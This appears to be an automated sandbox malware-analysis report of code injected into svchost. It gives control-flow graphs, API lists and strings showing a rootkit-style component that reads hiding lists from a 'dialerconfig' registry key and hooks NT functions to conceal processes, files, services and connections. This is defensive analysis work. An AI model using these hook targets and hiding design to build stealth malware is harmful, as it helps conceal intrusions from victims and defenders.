                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: 63ae50b773a4caa5d4831f2ee6b05969020ab05f2f178b6e4593734b678c3e6d
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: A7217736609BA486EB128F69F4042DAF3F0FB88B98F154126DE8D47B14FF78C55A8700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: b81e471515b737dd2ab1ebc591edad30e19392da5984ba902ea58f1ea3a0d485
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 6DE0397161161086E7068BB2E80478937F1EB88B05F488024CD0907750DF7D849DC740

                                            Execution Graph

                                            Execution Coverage:0.7%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:68
                                            Total number of Limit Nodes:2
                                            execution_graph 14017 2295d561c28 14022 2295d561650 GetProcessHeap HeapAlloc 14017->14022 14019 2295d561c3e Sleep SleepEx 14020 2295d561c37 14019->14020 14020->14019 14021 2295d5615c0 StrCmpIW StrCmpW 14020->14021 14021->14020 14066 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14022->14066 14024 2295d561678 14067 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14024->14067 14026 2295d561689 14068 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14026->14068 14028 2295d561692 14069 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14028->14069 14030 2295d56169b 14031 2295d5616b6 RegOpenKeyExW 14030->14031 14032 2295d5618ce 14031->14032 14033 2295d5616e8 RegOpenKeyExW 14031->14033 14032->14020 14034 2295d561727 RegOpenKeyExW 14033->14034 14035 2295d561711 14033->14035 14036 2295d56174b 14034->14036 14037 2295d561762 RegOpenKeyExW 14034->14037 14070 2295d5612c8 RegQueryInfoKeyW 14035->14070 14080 2295d56104c RegQueryInfoKeyW 14036->14080 14040 2295d56179d RegOpenKeyExW 14037->14040 14041 2295d561786 14037->14041 14045 2295d5617d8 RegOpenKeyExW 14040->14045 14046 2295d5617c1 14040->14046 14044 2295d5612c8 16 API calls 14041->14044 14047 2295d561793 RegCloseKey 14044->14047 14049 2295d5617fc 14045->14049 14050 2295d561813 RegOpenKeyExW 14045->14050 14048 2295d5612c8 16 API calls 14046->14048 14047->14040 14053 2295d5617ce RegCloseKey 14048->14053 14054 2295d5612c8 16 API calls 14049->14054 14051 2295d56184e RegOpenKeyExW 14050->14051 14052 2295d561837 14050->14052 14056 2295d561889 RegOpenKeyExW 14051->14056 14057 2295d561872 14051->14057 14055 2295d56104c 6 API calls 14052->14055 14053->14045 14058 2295d561809 RegCloseKey 14054->14058 14059 2295d561844 RegCloseKey 14055->14059 14061 2295d5618ad 14056->14061 14062 2295d5618c4 RegCloseKey 14056->14062 14060 2295d56104c 6 API calls 14057->14060 14058->14050 14059->14051 14063 2295d56187f RegCloseKey 14060->14063 14064 2295d56104c 6 API calls 14061->14064 14062->14032 14063->14056 14065 2295d5618ba RegCloseKey 14064->14065 14065->14062 14066->14024 14067->14026 14068->14028 14069->14030 14071 2295d561499 RegCloseKey 14070->14071 14072 2295d561334 GetProcessHeap HeapAlloc 14070->14072 14071->14034 14073 2295d56135d RegEnumValueW 14072->14073 14074 2295d561485 GetProcessHeap HeapFree 14072->14074 14076 2295d5613af 14073->14076 14074->14071 14076->14073 14076->14074 14077 2295d56142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14076->14077 14078 2295d5613dd GetProcessHeap HeapAlloc 14076->14078 14079 2295d561413 GetProcessHeap HeapFree 14076->14079 14086 2295d561554 14076->14086 14077->14076 14078->14076 14079->14077 14081 2295d5611b5 RegCloseKey 14080->14081 14084 2295d5610b9 14080->14084 14081->14037 14082 2295d5610c7 RegEnumValueW 14082->14084 14083 2295d561149 GetProcessHeap HeapAlloc 14083->14084 14084->14081 14084->14082 14084->14083 14085 2295d56117f GetProcessHeap HeapFree 14084->14085 14085->14084 14087 2295d5615a4 14086->14087 14090 2295d56156e 14086->14090 14087->14076 14088 2295d56158d StrCmpW 14088->14090 14089 2295d561585 StrCmpIW 14089->14090 14090->14087 14090->14088 14090->14089 14091 2295d532908 14093 2295d532936 14091->14093 14092 2295d532a2b LoadLibraryA 14092->14093 14093->14092 14094 2295d532aa7 14093->14094

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: 5fa08749519fdd083dd3e1f0d39032132afecf1b20116e9cc23eacd99de3edae
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction Fuzzy Hash: D8113C6171070271FB2797E9B50E7696294F794746FD80029FB168529CEF39C0EAC630

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000002295D561650: GetProcessHeap.KERNEL32 ref: 000002295D56165B
                                              • Part of subcall function 000002295D561650: HeapAlloc.KERNEL32 ref: 000002295D56166A
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5616DA
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561707
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561721
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561741
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D56175C
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D56177C
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561797
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5617B7
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5617D2
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5617F2
                                            • Sleep.KERNEL32 ref: 000002295D561C43
                                            • SleepEx.KERNELBASE ref: 000002295D561C49
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D56180D
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D56182D
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561848
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561868
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561883
                                              • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5618A3
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5618BE
                                              • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5618C8
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: 821f73ed8f2b7e9f5efbed1530173072f609ca8afc59f27a2d85262a82f8ebfe
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: 7031EF65702601B1FE569FBEF64977A12A4AB44BC5FD44021EE09C769EEE14C8F2C270

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 57 2295d563930-2295d56393b 58 2295d56393d-2295d563950 StrCmpNIW 57->58 59 2295d563955-2295d56395c 57->59 58->59 60 2295d563952 58->60 60->59
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: dialer
                                            • API String ID: 0-3528709123
                                            • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction ID: 6065884056ec97f2f48920713d01fdf3d33b039ec21e88ccf8d5ed595a0e7037
                                            • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction Fuzzy Hash: A2D0A76031120BA6FF16DFE9D8C92602350EB14754FC88020DB050211CD7188DEFCB30

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: 58ff464dfdc6c4ecbc8e9b3855974d3a25b238110f5a3486ce761eece11ac661
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: 0B610422701A91A7EE6ACF9DD45476CB391FF14B94FD48015EA1907789DB38D8E3C720

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 207 2295d562cdc-2295d562d55 call 2295d57ecc0 210 2295d563090-2295d5630b3 207->210 211 2295d562d5b-2295d562d61 207->211 211->210 212 2295d562d67-2295d562d6a 211->212 212->210 213 2295d562d70-2295d562d73 212->213 213->210 214 2295d562d79-2295d562d89 GetModuleHandleA 213->214 215 2295d562d9d 214->215 216 2295d562d8b-2295d562d9b call 2295d573090 214->216 218 2295d562da0-2295d562dbe 215->218 216->218 218->210 221 2295d562dc4-2295d562de3 StrCmpNIW 218->221 221->210 222 2295d562de9-2295d562ded 221->222 222->210 223 2295d562df3-2295d562dfd 222->223 223->210 224 2295d562e03-2295d562e0a 223->224 224->210 225 2295d562e10-2295d562e23 224->225 226 2295d562e25-2295d562e31 225->226 227 2295d562e33 225->227 228 2295d562e36-2295d562e3a 226->228 227->228 229 2295d562e3c-2295d562e48 228->229 230 2295d562e4a 228->230 231 2295d562e4d-2295d562e57 229->231 230->231 232 2295d562f4d-2295d562f51 231->232 233 2295d562e5d-2295d562e60 231->233 236 2295d562f57-2295d562f5a 232->236 237 2295d563082-2295d56308a 232->237 234 2295d562e72-2295d562e7c 233->234 235 2295d562e62-2295d562e6f call 2295d561a14 233->235 239 2295d562eb0-2295d562eba 234->239 240 2295d562e7e-2295d562e8b 234->240 235->234 241 2295d562f6b-2295d562f75 236->241 242 2295d562f5c-2295d562f68 call 2295d561a14 236->242 237->210 237->225 247 2295d562ebc-2295d562ec9 239->247 248 2295d562eea-2295d562eed 239->248 240->239 246 2295d562e8d-2295d562e9a 240->246 243 2295d562f77-2295d562f84 241->243 244 2295d562fa5-2295d562fa8 241->244 242->241 243->244 253 2295d562f86-2295d562f93 243->253 254 2295d562faa-2295d562fb3 call 2295d561d28 244->254 255 2295d562fb5-2295d562fc2 lstrlenW 244->255 256 2295d562e9d-2295d562ea3 246->256 247->248 257 2295d562ecb-2295d562ed8 247->257 250 2295d562eef-2295d562ef9 call 2295d561d28 248->250 251 2295d562efb-2295d562f08 lstrlenW 248->251 250->251 264 2295d562f43-2295d562f48 250->264 259 2295d562f2b-2295d562f3d call 2295d563930 251->259 260 2295d562f0a-2295d562f14 251->260 261 2295d562f96-2295d562f9c 253->261 254->255 272 2295d562ffa-2295d563005 254->272 265 2295d562fe5-2295d562fef call 2295d563930 255->265 266 2295d562fc4-2295d562fce 255->266 263 2295d562ea9-2295d562eae 256->263 256->264 267 2295d562edb-2295d562ee1 257->267 259->264 275 2295d562ff2-2295d562ff4 259->275 260->259 270 2295d562f16-2295d562f29 call 2295d561554 260->270 271 2295d562f9e-2295d562fa3 261->271 261->272 263->239 263->256 264->275 265->275 266->265 276 2295d562fd0-2295d562fe3 call 2295d561554 266->276 267->264 277 2295d562ee3-2295d562ee8 267->277 270->259 270->264 271->244 271->261 279 2295d56307c-2295d563080 272->279 280 2295d563007-2295d56300b 272->280 275->237 275->272 276->265 276->272 277->248 277->267 279->237 284 2295d56300d-2295d563011 280->284 285 2295d563013-2295d56302d call 2295d5686a0 280->285 284->285 288 2295d563030-2295d563033 284->288 285->288 291 2295d563035-2295d563053 call 2295d5686a0 288->291 292 2295d563056-2295d563059 288->292 291->292 292->279 294 2295d56305b-2295d563079 call 2295d5686a0 292->294 294->279
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: f2a50276a7f58650b45cb133d784554c7d0c909d8cf186fa0b951f4959fe23cb
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: A6B1A032310690A1FB668FADE5487A9A3A4F744B94FD45026FE0953798EF35CCE2C360

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: ec8428cfff50fd4698ec7a4d76673dc6833da7d9a6fe1aa8436e99a841b4a814
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 00317272304B80A5EB618FB4E8447DD7360F784754F84442AEB4D47B98EF38C599C720
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: 3032b272586a6c397c41cf937fc48523399078f95e56603a1cc937f571c125ad
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: 26315F32314B8096EB61CF69E84439E73A4F788794F900116EB9D43BA8EF38C596CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: 2ede8e80a4922f46ea2b94f1ca3103131468163758670aabf093de3d06320519
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: CEE1F132B14A80AAE712CFACD4882DD7BB1F3457D8FA44116EE4A57B9DDA34C4A7C710

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 9694f6a56c70c1e61b2cb303acce30649b4cd8d78f3a5f68c02a3686739e7b9d
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: 1F712D36311A50A6EF11DFAAE848AAD27B4F784BD9F801111EE4D47B2CEF34C4A6C310

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: 9358fa33283ac00e48e3eef096d7c2d4eae6e59f5b07b3883fc98092d27cb8ea
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: 50517C72315B44A6EB11CFAAE44879AB7A1F789BD0F948124EB5907B18DF38C0A6C710

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: 8f0406c9d72b5bc1e1389ac32f2862628cca4651ba679a8cc03cb218467e707d
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: 83318264714A4AB0FA0BEFECF85A6D42321A744384FE05523F51D161AD9E3882FBC3B0

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 59b3c048340175dda705e04b33da8eef287338f84e38432b0e44bfee1e5aaebc
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: 93213D36714B40A2FB11CB69F54835A63A0F389BE5FA04215EA5942BACDF3CC19ACB10

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: e8debce94c918ebd2bccc068a38c4033034fbb1ff3e4cd6db11c0c3b8dc11bd9
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: 0341A433214B80E7EB61CF95E4487AEB7A1F389794F408125EB8907B58DF38C1A5CB10

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 322 2295d5369f0-2295d5369f6 323 2295d536a31-2295d536a3b 322->323 324 2295d5369f8-2295d5369fb 322->324 325 2295d536b58-2295d536b6d 323->325 326 2295d5369fd-2295d536a00 324->326 327 2295d536a25-2295d536a64 call 2295d5370a0 324->327 331 2295d536b7c-2295d536b96 call 2295d536f34 325->331 332 2295d536b6f 325->332 329 2295d536a02-2295d536a05 326->329 330 2295d536a18 __scrt_dllmain_crt_thread_attach 326->330 345 2295d536a6a-2295d536a7f call 2295d536f34 327->345 346 2295d536b32 327->346 336 2295d536a11-2295d536a16 call 2295d536fe4 329->336 337 2295d536a07-2295d536a10 329->337 334 2295d536a1d-2295d536a24 330->334 343 2295d536bcf-2295d536c00 call 2295d537270 331->343 344 2295d536b98-2295d536bcd call 2295d53705c call 2295d536efc call 2295d5373f8 call 2295d537210 call 2295d537234 call 2295d53708c 331->344 338 2295d536b71-2295d536b7b 332->338 336->334 354 2295d536c02-2295d536c08 343->354 355 2295d536c11-2295d536c17 343->355 344->338 357 2295d536b4a-2295d536b57 call 2295d537270 345->357 358 2295d536a85-2295d536a96 call 2295d536fa4 345->358 349 2295d536b34-2295d536b49 346->349 354->355 359 2295d536c0a-2295d536c0c 354->359 360 2295d536c19-2295d536c23 355->360 361 2295d536c5e-2295d536c74 call 2295d532858 355->361 357->325 375 2295d536a98-2295d536abc call 2295d5373bc call 2295d536eec call 2295d536f18 call 2295d5390dc 358->375 376 2295d536ae7-2295d536af1 call 2295d537210 358->376 365 2295d536cff-2295d536d0c 359->365 366 2295d536c2f-2295d536c3d call 2295d542758 360->366 367 2295d536c25-2295d536c2d 360->367 378 2295d536cac-2295d536cae 361->378 379 2295d536c76-2295d536c78 361->379 372 2295d536c43-2295d536c58 call 2295d5369f0 366->372 389 2295d536cf5-2295d536cfd 366->389 367->372 372->361 372->389 375->376 425 2295d536abe-2295d536ac5 __scrt_dllmain_after_initialize_c 375->425 376->346 398 2295d536af3-2295d536aff call 2295d537260 376->398 387 2295d536cb0-2295d536cb3 378->387 388 2295d536cb5-2295d536cca call 2295d5369f0 378->388 379->378 386 2295d536c7a-2295d536c9c call 2295d532858 call 2295d536b58 379->386 386->378 419 2295d536c9e-2295d536ca6 call 2295d542758 386->419 387->388 387->389 388->389 407 2295d536ccc-2295d536cd6 388->407 389->365 409 2295d536b01-2295d536b0b call 2295d537178 398->409 410 2295d536b25-2295d536b30 398->410 413 2295d536ce1-2295d536cf1 call 2295d542758 407->413 414 2295d536cd8-2295d536cdf 407->414 409->410 424 2295d536b0d-2295d536b1b 409->424 410->349 413->389 414->389 419->378 424->410 425->376 426 2295d536ac7-2295d536ae4 call 2295d539078 425->426 426->376
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: e9bb5c31c14fc3d395f6a425828c02ffbebde6951f409e7a1fe5992b683253f2
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 4981F021704685A6FA53AFED945935962D0EF95780FD4802DFA048779EDB38C8FB8730

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 429 2295d5675f0-2295d5675f6 430 2295d5675f8-2295d5675fb 429->430 431 2295d567631-2295d56763b 429->431 432 2295d5675fd-2295d567600 430->432 433 2295d567625-2295d567664 call 2295d567ca0 430->433 434 2295d567758-2295d56776d 431->434 435 2295d567618 __scrt_dllmain_crt_thread_attach 432->435 436 2295d567602-2295d567605 432->436 449 2295d56766a-2295d56767f call 2295d567b34 433->449 450 2295d567732 433->450 437 2295d56776f 434->437 438 2295d56777c-2295d567796 call 2295d567b34 434->438 444 2295d56761d-2295d567624 435->444 440 2295d567607-2295d567610 436->440 441 2295d567611-2295d567616 call 2295d567be4 436->441 442 2295d567771-2295d56777b 437->442 452 2295d5677cf-2295d567800 call 2295d567e70 438->452 453 2295d567798-2295d5677cd call 2295d567c5c call 2295d567afc call 2295d567ff8 call 2295d567e10 call 2295d567e34 call 2295d567c8c 438->453 441->444 461 2295d56774a-2295d567757 call 2295d567e70 449->461 462 2295d567685-2295d567696 call 2295d567ba4 449->462 454 2295d567734-2295d567749 450->454 463 2295d567811-2295d567817 452->463 464 2295d567802-2295d567808 452->464 453->442 461->434 481 2295d5676e7-2295d5676f1 call 2295d567e10 462->481 482 2295d567698-2295d5676bc call 2295d567fbc call 2295d567aec call 2295d567b18 call 2295d569cdc 462->482 469 2295d56785e-2295d567874 call 2295d563458 463->469 470 2295d567819-2295d567823 463->470 464->463 468 2295d56780a-2295d56780c 464->468 475 2295d5678ff-2295d56790c 468->475 490 2295d5678ac-2295d5678ae 469->490 491 2295d567876-2295d567878 469->491 476 2295d56782f-2295d56783d call 2295d573358 470->476 477 2295d567825-2295d56782d 470->477 484 2295d567843-2295d567858 call 2295d5675f0 476->484 494 2295d5678f5-2295d5678fd 476->494 477->484 481->450 502 2295d5676f3-2295d5676ff call 2295d567e60 481->502 482->481 532 2295d5676be-2295d5676c5 __scrt_dllmain_after_initialize_c 482->532 484->469 484->494 492 2295d5678b0-2295d5678b3 490->492 493 2295d5678b5-2295d5678ca call 2295d5675f0 490->493 491->490 499 2295d56787a-2295d56789c call 2295d563458 call 2295d567758 491->499 492->493 492->494 493->494 511 2295d5678cc-2295d5678d6 493->511 494->475 499->490 526 2295d56789e-2295d5678a6 call 2295d573358 499->526 519 2295d567725-2295d567730 502->519 520 2295d567701-2295d56770b call 2295d567d78 502->520 516 2295d5678d8-2295d5678df 511->516 517 2295d5678e1-2295d5678f1 call 2295d573358 511->517 516->494 517->494 519->454 520->519 531 2295d56770d-2295d56771b 520->531 526->490 531->519 532->481 533 2295d5676c7-2295d5676e4 call 2295d569c78 532->533 533->481
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
